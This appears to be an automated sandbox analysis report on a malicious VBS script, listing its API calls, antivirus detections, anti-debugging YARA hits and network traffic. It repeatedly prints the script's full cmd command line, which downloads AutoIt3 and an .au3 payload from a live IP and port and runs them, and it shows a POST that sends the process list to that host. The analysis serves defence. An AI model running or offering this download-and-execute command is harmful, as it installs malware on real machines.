neverban_FFNTdW.vbs

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 26, 2023, 6:06 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (4 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 26, 2023, 6:06 p.m.	buffer: The system cannot find the file specified. console_handle: 0x00000007	1	1	0
WriteConsoleW Sept. 26, 2023, 6:06 p.m.	buffer: 'eyzq' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1	0
WriteConsoleW Sept. 26, 2023, 6:06 p.m.	buffer: 'eyzq' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1	0
WriteConsoleW Sept. 26, 2023, 6:06 p.m.	buffer: 'Autoit3.exe' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1	0

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3

Executes one or more WMI queries (1 event)

wmi	Select * from Win32_Process

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 26, 2023, 6:06 p.m.	show_type: 0 filepath_r: cmd parameters: /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3 filepath: cmd	1	1	0

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.VBS.SAgent.gen
ZoneAlarm	HEUR:Trojan.VBS.SAgent.gen
AVG	Script:SNH-gen [Trj]

Yara rule detected in process memory (9 events)

description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	DebuggerException__SetConsoleCtrl
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
cmdline	cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3

Communicates with host for which no DNS query was performed (1 event)

host	66.42.63.27

Wscript.exe initiated network communications indicative of a script based payload download (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Sept. 26, 2023, 6:06 p.m.	buffer: POST /eyzqxxxk HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351 socket: 604		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
WSASend Sept. 26, 2023, 6:06 p.m.	buffer: POST /eyzqxxxk HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) a: System Idle ProcessSystemsmss.execsrss.exewininit.execsrss.exewinlogon.exeservices.exelsass.exelsm.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exeaudiodg.exesvchost.exesvchost.exespoolsv.exesvchost.exesrvany.exeKMService.execonhost.exetaskhost.exesppsvc.exesvchost.exedwm.exeexplorer.exepw.exeSearchIndexer.exeSearchProtocolHost.exeSearchFilterHost.exemobsync.exepw.exetaskhost.exewsqmcons.exesdclt.exewscript.exeWmiPrvSE.exe Content-Length: 0 Host: 66.42.63.27:2351 socket: 604		0	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\cmd.exe" /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3
parent_process	wscript.exe				martian_process	cmd /c mkdir c:\eyzq & cd /d c:\eyzq & copy c:\windows\system32\curl.exe eyzq.exe & eyzq -H "User-Agent: curl" -o Autoit3.exe http://66.42.63.27:2351 & eyzq -o blefnf.au3 http://66.42.63.27:2351/msieyzqxxxk & Autoit3.exe blefnf.au3

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Process injection	Process 2556 resumed a thread in remote process 2748
Time & API	Arguments	Status	Return	Repeated
NtResumeThread Sept. 26, 2023, 6:06 p.m.	thread_handle: 0x00000388 suspend_count: 1 process_identifier: 2748	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe